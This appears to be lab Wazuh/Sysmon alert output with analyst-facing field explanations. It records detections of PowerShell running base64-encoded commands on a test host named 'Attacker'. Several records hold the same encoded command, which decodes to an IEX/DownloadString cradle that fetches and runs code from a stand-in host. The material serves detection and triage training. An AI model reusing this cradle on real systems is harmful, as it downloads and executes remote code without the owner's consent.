data.win.eventdata.parentProcessGuid:  {94294ddc-bd79-680a-8b0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3688
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:56.476+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:56.476+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  83
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534336.1741285
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:53.8502052Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284944
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:53.827 ProcessGuid: {94294ddc-bd7c-680a-8d0b-000000000e00} ProcessId: 14828 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_owe3gjix.5wo.ps1 CreationUtcTime: 2025-04-24 22:38:53.827 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:53.827
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd7c-680a-8d0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14828
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_owe3gjix.5wo.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:53.827
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:59.913+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:59.913+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  80
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534339.1744054
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:57.2803391Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284980
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:55.073 ProcessGuid: {94294ddc-bd7f-680a-8f0b-000000000e00} ProcessId: 2520 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd7c-680a-8d0b-000000000e00} ParentProcessId: 14828 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:55.073
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd7f-680a-8f0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2520
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd7c-680a-8d0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  14828
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:59.915+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:59.915+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  84
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534339.1752121
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:57.6272922Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284981
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:57.575 ProcessGuid: {94294ddc-bd7f-680a-8f0b-000000000e00} ProcessId: 2520 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mjeitfip.wlw.ps1 CreationUtcTime: 2025-04-24 22:38:57.569 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:57.575
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd7f-680a-8f0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2520
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mjeitfip.wlw.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:57.569
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:02.414+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:02.414+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  81
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534342.1754886
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:59.8050356Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285021
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:58.630 ProcessGuid: {94294ddc-bd82-680a-910b-000000000e00} ProcessId: 13540 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd7f-680a-8f0b-000000000e00} ParentProcessId: 2520 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:58.630
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd82-680a-910b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13540
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd7f-680a-8f0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  2520
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
